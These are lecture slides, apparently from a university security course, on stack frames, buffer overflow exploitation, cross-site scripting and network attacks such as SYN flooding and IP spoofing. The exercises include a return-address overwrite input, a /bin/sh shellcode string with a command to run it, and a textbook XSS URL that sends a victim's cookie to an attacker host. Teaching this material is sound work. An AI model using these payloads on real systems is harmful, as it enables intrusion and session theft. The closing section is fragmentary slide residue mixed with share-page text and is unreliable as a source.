 A stack of objects has the property that the last object
placed on the stack will be the first object removed.
 This property is commonly referred to as last in, first out
or a LIFO.
 Two of the most important operations are PUSH and
POP.
 PUSH adds an element at the top of the stack.
 POP reduces the stack size by one by removing the last
element at the top of the stack.
Why the stack is for
 Procedures and functions are high level structural

tools in programming languages.
 Both alter the flow of execution in a program.
 At completion, the control of execution resumes
from the next instruction following the call.
 Stack helps to implement these transfer of controls.
 Stack is also used to dynamically allocate local
variables, to pass parameters and to return values
from functions or procedures.
 Return @
Stack frame
 The stack consists of logical stack frames that are

pushed when calling a function and popped when
returning.
 It contains
◦ The parameters to the function
◦ Return values
◦ Its local variables
◦ The control data necessary to recover the previous
stack frame, including the value of the instruction
pointer (EIP) at the time of the function call (ie. the
return address)
Process
 When a program is executed, it is run in a
process.
 As the process executes the program, it
creates a new stack frame on the stack
each time it gets a function call.
 And pushes each new local variable on the
“current” stack.
Registers related to stack
 ESP (Stack Pointer): This register always points to the top of the
process stack.
 EBP (Base Pointer): Also called Frame Pointer, it points to the base
of the stack frame for the particular function. This register is used to
reference the function parameters and the local variables in the
current stack frame. Ebp is a fixed pointer in the lifetime of a
function (ie. Stack frame)
 EIP(Instruction Pointer): This holds the address of the next CPU

instruction to be executed.
Example
int sum(int a, int b) {
 int c;
 c = a+b;
 return c;
}
void main() {
 int x, y, z;
 x = 3;
 y = 4;
 z = sum(x, y);
 printf("The sum: %d\n", z);
}
Compiling & Assembling
gcc -fno-stack-protector simpleSum.c -o simpleSum
gcc -S -fno-stack-protector simpleSum.c -o simpleSum.s

 [ 0x080483da <main+0>: lea 0x4(%esp), %ecx [da, db, dc, dd]
 0x080483de <main+4>: and $0xfffffff0, %esp [de, df, e0]
 0x080483e1 <main+7>: pushl -0x4(%ecx) ] [e1, e2, e3]
 0x080483e4 <main+10>: push %ebp

 0x080483e5 <main+11>: mov %esp, %ebp [ebp  esp]
 0x080483e7 <main+13>: push %ecx
 0x080483e8 <main+14>: sub $0x24, %esp [esp = esp – 36]
 0x080483eb <main+17>: movl $0x3,-0x8(%ebp) // variable x
 0x080483f2 <main+24>: movl $0x4,-0xc(%ebp) // variable y
 0x080483f9 <main+31>: mov -0xc(%ebp), %eax
 0x080483fc <main+34>: mov %eax, 0x4(%esp)
 0x08048400 <main+38>: mov -0x8(%ebp), %eax
 0x08048403 <main+41>: mov %eax, (%esp)
 0x08048406 <main+44>: call 0x80483c4 <sum> // @ called fct
 0x0804840b <main+49>: mov %eax, -0x10(%ebp) [return @]
 0x0804840e <main+52>: mov -0x10(%ebp), %eax
 0x08048411 <main+55>: mov %eax, 0x4(%esp)
 0x08048415 <main+59>: movl $0x80484f0,(%esp)
 0x0804841c <main+66>: call 0x80482f8 <printf@plt>
 0x08048421 <main+71>: mov $0x0, %eax
 0x08048426 <main+76>: add $0x24, %esp
 0x08048429 <main+79>: pop %ecx
 0x0804842a <main+80>: pop %ebp
 0x0804842b <main+81>: lea -0x4(%ecx),%esp
Sum()
 0x080483c4 <sum+0>: push %ebp
 0x080483c5 <sum+1>: mov %esp, %ebp
 0x080483c7 <sum+3>: sub $0x10, %esp
 0x080483ca <sum+6>: mov 0xc(%ebp), %edx //4
 0x080483cd <sum+9>: mov 0x8(%ebp), %eax //3
 0x080483d0 <sum+12>: add %edx, %eax [eax = eax+edx]
 0x080483d2 <sum+14>: mov %eax, -0x4(%ebp)
 0x080483d5 <sum+17>: mov -0x4(%ebp), %eax //7
 0x080483d8 <sum+20>: leave
 0x080483d9 <sum+21>: ret
Main Stack Frame Sum Stack Frame
C035
EBP os
C005
C031
[ECX]
C02D Ret @
3 C001
C029
4 EBP
C025
7
BFFD
C021 String Var
C01D
BFF9
C019 String Var
C015 BFF5
String Var
C011
4
C00D
3
C009
0x0804840b
Immediately after a function is called…
 It first saves the ebp of the (F1) calling stack frame on its (F2) stack frame
◦ Pushl %ebp [This automatically makes esp to point at this point in the
current stack frame]
 Then it copies esp (see above) into ebp so that ebp points to the base of the
current (F2) stack frame
◦ Movl esp, ebp
 Then advances esp a few words “down” to reserve spaces for local
variables
◦ Subl $20, %esp (Note that stack grows in opposite direction to the
memory) [esp = esp – 2x16+0] 32/4 = 8 cells (1 cell = 4 bytes)
 [F2 now starts to run its instructions]
 Upon termination, the stack is cleaned up again
◦ Leave (equivalent to Mov %ebp, %esp and Pop %ebp)
 Finally ret (urn) is executed effectively loading the register eip with the
return address on the calling function
◦ Ret (equivalent to “Pop %eip”)
On the calling side …
 The parameters are pushed onto the stack (if any)
◦ Push …
 Followed by the return address. This is the address of

the instruction that will be executed when control is
returned back.
◦ Call function (equivalent to “push eip”, eip @ of
called function)
Buffer Overflow Vulnerability
 A condition under which more data can be put into a

memory area (buffer) than the capacity allocated,
overwriting other information in the vicinity. This
vulnerability exists with string manipulation.
 Typically, C/C++ string routines such as strcpy(),

strcat(), gets(), cin, scanf(), etc do not check the length
of the incoming string against the memory spaces
reserved.
Buffer Overflow Exploit
 Attackers injects executable code in a form of string input with

the following purposes in mind:
◦ Redirection: Smash/Overflow the stack and change the Ret
@ saved in the stack with a new address of their design to
hijack the normal order of execution. This is a relatively
easier task.
◦ Execution: [More importantly] the new Ret @ supplied by
the attacker points to an address within the supplied
executable code (which by now is laying in the stack
memory) so that the computer can execute it.
 If the target vulnerable program was running with Super User
privilege, the supplied malicious code will also be executed
likewise.
Exercise 1: Redirection
Referring to the program on the subsequent

slides, redirect the flow of execution to the
function countSmall() even if it is not called
by the main function.
int countSmall(char * str) {

 char buf1[4];
 int len =0;
 int nbLow=0;
 buf1[0] = 'V';
 strcpy(buf1, str); // bof vulnerable
 len = strlen(buf1);
 while (len > 0) {
 if (islower(buf1[len-1])) nbLow=nbLow+1;
 len--;
 }
 printf("\n CountSmall: %d \n\n", nbLow);
 return nbLow;
}
 int countCapital(char * str) {
 char buf1[4];
 int len =0;
 int nbCap=0;
 buf1[0] = 'V’; // for debugging – not part of the code
 strcpy(buf1, str); // this is the vulnerable line
 len = strlen(buf1);
 while (len > 0) {
 if (isupper(buf1[len-1])) nbCap=nbCap+1;
 len--;
 }
 printf("\n CountCapital: %d \n\n", nbCap);
 return nbCap;
 }
int main(int argc, char * argv[ ]) {

 printf("\n Number of capital letters: %d \n\n", countCapital(argv[1]));
printf("\n Program successful \n\n");
 return 0;
}
gcc -ggdb3 smashit.c -o smashit

Fragment of main() :
Few lines of dump of assembler code for function main:

0x080485de <main+0>: lea 0x4(%esp),%ecx
0x080485e2 <main+4>: and $0xfffffff0,%esp
0x080485e5 <main+7>: pushl -0x4(%ecx)
0x080485e8 <main+10>: push %ebp

0x080485e9 <main+11>: mov %esp,%ebp
0x080485eb <main+13>: push %ecx
0x080485ec <main+14>: sub $0x14,%esp
0x080485ef <main+17>: mov 0x4(%ecx),%eax
0x080485f2 <main+20>: add $0x4,%eax
0x080485f5 <main+23>: mov (%eax),%eax
0x080485f7 <main+25>: mov %eax,(%esp)
0x080485fa <main+28>: call 0x80484c4 <countCapital>
0x080485ff <main+33>: mov %eax,0x4(%esp)
End of few lines of .... main.

Fragment of countCapital():
Few lines of dump of assembler code for function countCapital:

0x080484c4 <countCapital+0>: push %ebp
0x080484c5 <countCapital+1>: mov %esp,%ebp
0x080484c7 <countCapital+3>: sub $0x18,%esp
0x080484ca <countCapital+6>: movl $0x0,-0x8(%ebp)
0x080484d1 <countCapital+13>: movl $0x0,-0xc(%ebp)
0x080484d8 <countCapital+20>: movb $0x56,-0x4(%ebp)
0x080484dc <countCapital+24>: mov 0x8(%ebp),%eax
0x080484df <countCapital+27>: mov %eax,0x4(%esp)
0x080484e3 <countCapital+31>: lea -0x4(%ebp),%eax
0x080484e6 <countCapital+34>: mov %eax,(%esp)
0x080484e9 <countCapital+37>: call 0x80483c0 <strcpy@plt>
End of few lines of .... countCapital
Fragment of countSmall():
Few lines of dump of assembler code for function countSmall:

0x08048551 <countSmall+0>: push %ebp
0x08048552 <countSmall+1>: mov %esp,%ebp
0x08048554 <countSmall+3>: sub $0x18,%esp
0x08048557 <countSmall+6>: movl $0x0,-0x8(%ebp) // len
0x0804855e <countSmall+13>: movl $0x0,-0xc(%ebp) // nbLow
0x08048565 <countSmall+20>: movb $0x56,-0x4(%ebp) // buf1
0x08048569 <countSmall+24>: mov 0x8(%ebp),%eax
0x0804856c <countSmall+27>: mov %eax,0x4(%esp)
0x08048570 <countSmall+31>: lea -0x4(%ebp),%eax
0x08048573 <countSmall+34>: mov %eax,(%esp)
0x08048576 <countSmall+37>: call 0x80483c0 <strcpy@plt>
End of few lines of .... countSmall
Exercise 1: Redirection – Test run 1
> ./smashit AAA

> CountCapital: 3
 Number of capital letters: 3
 Program successful
> ./smashit Hello

> CountCapital: 111 (or any arbitrary number)
 Number of capital letters: 111 (or any arbitrary number)
 Program successful
Note: Sincewe have reserved only 4 bytes for buf1, the string
“Hello” somehow goes beyond the reserved spaces.
 > ./smashit HelloFromAddis
 CountCapital: 3 [any arbitrary number]
 [There is no “Program Successful”]
 Note: Since we have reserved only 4 bytes for buf1, the

string “Hello From Addis” goes beyond the reserved spaces
and even changes the Ret@ thus making the program unable
to go back to the main function as normally should.
 Program will not be executed normally (it may get stack,

aborted or any thing else can happen)
Exercise 1: Redirection (using Debugger gdb)
print$ebp-8
$3 = (void *) 0xbfa84770
(gdb) x/x $ebp-8
0xbfa84770:0x0000006f
(gdb) x/cb $ebp-12
0xbfa8476c: 104 'h'
0xbfa8476d:101 'e'
0xbfa8476e:108 'l'
....
(gdb) print nbCap
$4 = 111
Exercise 1: Redirection - Crafting an input to smash the stack
1. Find the location within the stack reserved for buf1.
2. Find the beginning address of the function:

countSmall().
3. Craft your input to smash the stack and put the beg
@ of countSmall at the return address.
Exercise 1: Redirection - Crafting an input to smash the stack
1. Buf1 is located at $ebp-4 which is exactly 8 bytes lower than

the return @ (you may find this using debugger such as “Gdb”)
2. Beg @ of countSmall: 0x08048551
3. Input string: 8 <any random char> + 0x08048551 (in reverse order)
[Command Prompt] > ./smashit `perl -e 'print ”A”x 8 . “\x51\x85\x04\x08”'`
[Debugger] set args `perl -e 'print ”A”x 8 . “\x51\x85\x04\x08”'`]

BoF: Crafting an executable input to smash the stack with
⚫There must exist in the target application at least one

function that requires a string input at run time (strcpy(),
gets(), etc).
⚫ When this function is called with a specially formatted string,

it causes the flow of execution to be redirected in a way that
was not intended by the creators of the application.
 Craft an executable code as part of the input string in

a such a way that when the stack is smashed, the flow
of execution is redirected to the “code” within the
input string (in the stack).
 The input shall contain an executable binary code

compatible with the target's machine architecture.
BoF: Shellcode as a payload
 Almost all OS do have a shell code that can be called from

within any program.
 The following is an example of such a program in C (and
Ubuntu Linux)
 void main() { // Shellcode31.c
 char *name[2];
 name[0] = "/bin/sh"; // bourne shell

 name[1] = NULL; // Null string
 execve(name[0], name, NULL);
 }
Since the shell (code) is already available within the OS, it

is quite possible to smash a vulnerable application
program and redirect the execution into spawning a shell
thereby having an interactive “control” onto the system
from a remote site.
If the shell spawned could be made to be a “root” shell,

the exploit would be a big hit.
BoF: Shellcode advantage to the attacker
• Interactive exploration of the system.

• Allow upload/download programs/files/databases, etc.
• Install Trojan horse, key logger, sniffer, enterprise
worm, etc.
• Start vulnerable services and keep them
running. Restarting the vulnerable service usually
allows attackers to attack the service again.
• Clean up traces like log files and events.
BoF: Shellcode elements
⚫ It must be in a machine-readable
program.
⚫ It must not contain a null character '\0‘.

[??]
⚫ The beg @ must be computed at run

time.
BoF: Shellcode
Assembling, linking and “object dumping” the shellcode

yields:
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\
x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x
8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x6
2\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42
\x42"'`
Note: This shellcode and other similar codes can be found
on the Internet.
BoF: Example vulnerable program – shellcode31.c
• void spawnShell(char * argString)

• { char buf1[8];
int *ret;
ret = buf1 + 16; /* this value can be adjusted by checking it
within a debugger */
buf1[0]='A’; // just for checking
• (*ret) = (int)argString; // the vulnerable line
• }
• int main(int argc, char * argv[]) {
• spawnShell(argv[1]);
return 0;
• }
Smash the stack and spawn the shell
./shellcode31 `perl -e 'print
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x
5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\
x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xf
f\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x4
2\x42\x42\x42"'`
Outcome: When the stack is smashed using the above

input, a super user owned shell is spawned giving the
attacker unlimited power to do anything on the target
computer.
Consequence
 Corruption of data used by the program

 Unexpected transfer of control
 Memory access violation
 Program termination
 etc
XSS – Cross Site Scripting
 This lecture is adopted from the following book: [Stut] Stuttard, Dafydd;
Pinto, Marcus.The Web Application Hacker's Handbook: Finding and
Exploiting Security Flaws, Wiley. Kindle Edition.
 XSS is a client-side attack (as opposed to server-side

attack).
 Why waste time breaking a fortified server (such as an

Internet banking server) when one can compromise
customers in a relatively crude attack that requires little
skill?
 XSS attack typically targets Web applications and enables
attackers to inject client-side script into Web pages.
 XSS allows attackers to bypass access controls such as the

same origin policy.
 XSS allows the attacker to do any of the following:

◦ Disclosure of personal data
◦ Session hijacking (Cookie theft)
◦ Execution of arbitrary commands
◦ Insert malware into the target
◦ etc.
 Reflected (Non Persistent) XSS
 Stored (Persistent) XSS Attack
 DOM-based XSS
Reflected XSS
 Reflected XSS exploits a web application feature in which a
message returned from a server is rendered on clients
browser
 Example:
http://www.vulnerable.site/error/5/Error.ashx?message=Sorry
%2c+an+error+occurred
 The victim, upon clicking the link, will generate a request to
www.vulnerable.site, as follows:
GET
/error/5/Error.ashx?message=Sorry%2c+an+error+occurred
HTTP/1.0
Host: www.vulnerable.site ...
Reflected XSS
 And the vulnerable site response would be:
<HTML> <Title>Welcome!</Title>
<p>Sorry, an error occurred.</p>
</HTML>
 In the above example, the application simply copies the

value of the message parameter in the URL and inserts it
into the error page template at the appropriate place
Reflected XSS: Executing scripts on client’s browser
Reflected XSS: Executing scripts on client’s browser
1. Attacker feeds a user with a URL containing a “malicious” script
(described in a later slide).
2. The user sends an http request to the application on the URL fed to him
by the attacker (in 1).
3. The server responds to the user's request. As a result of the XSS

vulnerability, the response contains the JavaScript the attacker created.
4. The user's browser receives the attacker's JavaScript and executes it in

the same way it does any other code it receives from the application.
This code causes the user's browser to make a request to the attacker’s
server possibly sending sensitive information such as session token (cookie)
to the attacker. It may also attempt and possibly succeed to implant a
persistent payload that can later be used to install a fully functional malware.
Exploiting Reflected XSS: How to steal a cookie
 Here follows an example of cookie stealing using XSS (taken
from [Stut])
 The user logs in to the application as normal and is issued a
cookie containing a session token: Set-Cookie:
sessId=184a9138ed37374201a4c9672362f12459c2a652491a3
 Through some means (described later), the attacker feeds the

following URL to the user:
http://mdsec.net/error/5/Error.ashx?message=<script>
var+i=new+Image ;+ i.src= http://mdattacker.net/
%2bdocument.cookie;</script>
 The above URL contains embedded JavaScript. However, the

attack payload steals user’s cookie and send it over to the
attacker.
Reflected XSS – Same origin policy
 Note first that if the script residing on mdattacker.net directly
queries document.cookie, it will not obtain the cookies issued
by mdsec.net, and the hijacking attack will fail. This is thanks to
“Same origin policy”.
 The same-origin policy is a key mechanism implemented within

browsers that is designed to keep content that came from
different origins from interfering with each other.
 Content received from one website is allowed to read and

modify other content received from the same site but is not
allowed to access content received from other sites [Stut].
Reflected XSS – how an attacker feeds a URL
 Phishing email containing a malicious URL
 Spear phishing
 Using an instant message
 The attacker might create his own website containing interesting

content that draws many users to visit. It also contains content
that causes the user's browser to make requests containing XSS
payloads to a vulnerable application.
 Many web applications implement a function to “tell a friend” or

send feedback to site administrators. This function often enables a
user to generate an e-mail with arbitrary content and recipients.
An attacker may be able to leverage this functionality to deliver
an XSS attack via an e-mail that actually originates from the
organization's own server.
Stored XSS
 This attack arises when data submitted by one user is stored
in the application (typically in a back-end database) and then is
displayed to other users without being filtered or sanitized
appropriately.
 Stored XSS vulnerabilities are common in applications that

support interaction between end users, or where
administrative staff access user records and data within the
same application.
 If a user can post a question containing embedded JS and the

application does not filter or sanitize this, an attacker can
cause arbitrary scripts to execute within the browser of
anyone who views the question.
Stored XSS
Stored XSS
1. Attacker feeds an application with a URL containing a “malicious” script
(described in a later slide). The application is expected to store attacker’s
feed (ie. comments, auction price, etc).
2. The user sends an http request to the application view or read a page as
s/he normally would (say to read the latest comments).
3. The server responds to the user's request. As a result of the XSS

vulnerability, the response contains the JavaScript the attacker created.
4. The user's browser receives the attacker's JavaScript and executes it in

the same way it does any other code it receives from the application.
This code causes the user's browser to make a request to the attacker’s
server possibly sending sensitive information such as session token
(cookie) to the attacker. It may also attempt and possibly succeed to
implant a persistent payload that can later be used to install a fully
functional malware.
DOM-based XSS
 Optional reading
HTML Tags responsible for XSS attacks
 <script> … </script>
 <body … >
 <b onmouseover=… </b>
 <img … >
 <iframe …>
 <input …>
 <link …>
 <table …>
 <div … >
 <object…>
DDoS: Distributed Denial of Service
Optional reading!
Malware
 Please read the following paper
(distribute by email):
“An Introduction to Malware”

By Robin Sharp

CS687 - Security Threats and Attack Verctors - Winter 2024

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CS687 - Security Threats and Attack Verctors - Winter 2024

Uploaded by

Copyright:

Available Formats

2. Threats and Attack Vectors

 Network Layer Threats

 Transport Layer Threats

 [Application/Upper Layer Threats]

 Wired data link layer attacks:

 Wireless data link layer attacks:

 Wired data link layer attacks:

 It maintains a MAC address table in a

 CAM table has a fixed size on a switch.

 In addition, hosts may broadcast gratuitous ARP messages

 ARP Spoofing can be used to redirect traffic.

 This puts the attacker in the middle of the

 Range and bandwidth: 29 meters (11 Mbps) to 485 meters (for 1

 IEEE 802.11 series of standards

 Infrastructure mode: the wireless network is composed of a

◦ Wireless stations (clients): Laptops, workstations, mobile phones,

 Open Authentication: This can hardly be an authentication

 Wi-Fi Protected Access (WPA): It is a basic security feature in the

 WiFi access points are shipped with a default SSID and

 An attacker can easily take control of the AP, change

 Regardless, if the SSID is captured, it is straight forward to

 Hackers may use sniffing tools to disclose sensitive

 Sniffing tools: Aircrack,-ng, tcpdump, Wireshark, Acrylic,

 If client’s MAC address is in the list then the client is

 One can easily change its MAC address to a legit MAC

 The attacker simply creates a hotspot on a smartphone

 Tools: Kali Linux (Backtrack)

 SYN Flooding attack

Receive SYN Segment

Receive SYN + ACK

 Normal closing using FIN

 The idea is to flood the server with a half

 The hostile client do not send an ACK Segment. Rather,

 The victim has to keep the half-opened connection in its

 If this backlog limit is reached, TCP will silently discard

 Describe what solution Google employ to

 A typical Smurf attack uses a broadcast address with the

 That way, all those involved would respond with an ICMP

The equivalent of Smurf Attack but on UDP

Left as an optional exercise!

 This is about faking own IP address (source IP address)

 Source IP address is usually ignored by the intermediate

 The source IP address is used by the destination node

Let X-Attacker, A-Victim, B-Target

1. X (posing as A) − −− > B : SYN (Seq = M (random #))

2. B − −− > A : SYN + ACK: (Seq = N (random #) , Ack: M+1)

3. What is next ? [Ack N+1]

2. Non Blind Spoofing

 Any returning packets goes back to the “victim’s”

 This is blind spoofing since the attacker could not

 X’s ability to guess the correct random sequence number

 In order to complete the 3-way handshake for a new

 Should the guess happen to be right, X will have a one-way connection

 X will now be able to send commands to B and B could execute these

 As to what commands B executes in such a situation depends on the

 Inserting a backdoor into the system will be a simpler way of intrusion.

1. Host A’s “reaction” to the SYN+ACK segment

3. Guessing the right sequence number (!)

 If the SYN+ACK segment reaches Host A, then

 This will break the incomplete connection.

 You need to put A “Out of game”!

1. Wait until A goes down or

2. Apply DoS attack such as “SYN Flood”